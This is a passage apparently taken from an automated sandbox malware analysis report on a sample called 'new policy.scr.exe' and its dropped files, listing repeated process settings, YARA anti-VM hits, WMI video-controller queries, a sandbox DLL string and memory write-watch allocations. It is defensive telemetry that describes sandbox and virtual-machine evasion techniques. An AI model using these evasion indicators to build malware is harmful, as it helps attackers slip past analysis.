Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Memory allocated: 1A510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Memory allocated: 5200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 5800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 13F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
